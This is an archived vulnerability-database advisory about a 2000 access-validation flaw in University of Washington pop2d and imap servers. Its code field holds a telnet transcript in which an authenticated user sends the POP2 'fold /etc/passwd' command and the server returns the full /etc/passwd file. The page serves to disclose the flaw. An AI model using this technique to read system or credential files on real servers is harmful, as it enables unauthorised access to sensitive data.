exploits , vulnerabilities , articles , Univ. of Washington pop2d Remote File Read Vulnerability

Title	Univ. of Washington pop2d Remote File Read Vulnerability
Published	2000-07-14-12:00AM
Updated	2000-07-14-12:00AM
Class	Access Validation Error
CVE	GENERIC-MAP-N ATCH
Remote	No
Local	Yes
Credit	This vulnerability was reported to SecurityFocus.com on July 14, 2000 by <mandark@mandark.jumpline.com>
Vulnerable	University of Washington pop2d 4.55 University of Washington imap 4.7 University of Washington imap 4.7 a University of Washington imap 4.7 b University of Washington imap 4.7 c University of Washington pop2d 4.54 University of Washington imap 4.6 University of Washington pop2d 4.51 University of Washington imap 4.5 University of Washington pop2d 4.46 University of Washington imap 4.4
Not Vulnerable
Code	[mandark@mandark mandark]$ telnet localhost 109 Trying 127.0.0.1... Connected to localhost.localdomain. Escape character is '^]'. + POP2 localhost.localdomain v4.46 server ready helo mandark blehpasshere #1 messages in /var/spool/mail/mandark read 1 =389 characters in message 1 retr Return-Path: <root@mandark.jumpline.com> Received: (from root@localhost) by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037 for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400 Date: Fri, 14 Jul 2000 12:28:07 -0400 From: root <root@mandark.jumpline.com> Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com> To: mandark@mandark.jumpline.com Status: RO message is here... acks =0 No more messages fold /etc/passwd #1 messages in /etc/passwd read 1 =1178 characters in message 1 retr Date: Thu, 13 Jul 2000 16:50:07 -0400 From: root@mandark.jumpline.com Subject: /etc/passwd MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Status: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false postfix:x:101:104:postfix:/var/spool/postfix: gdm:x:0:0::/home/gdm:/bin/bash mandark:x:500:503::/home/mandark:/bin/bash godie:x:0:0::/home/godie:/bin/bash mp3:x:501:506::/mp3:/bin/bash chefo:x:502:507::/home/chefo:/bin/bash crunch:x:503:508::/home/crunch:/bin/bash gsx:x:505:510::/home/gsx:/bin/csh matt:x:506:511::/home/matt:/bin/bash lyw0d:x:507:512::/home/lyw0d:/bin/bash
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
• 2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
• 2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
• 2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
• 2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
• 2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
• 2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
• 2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
• 2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
• 2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 18:09:54 +0000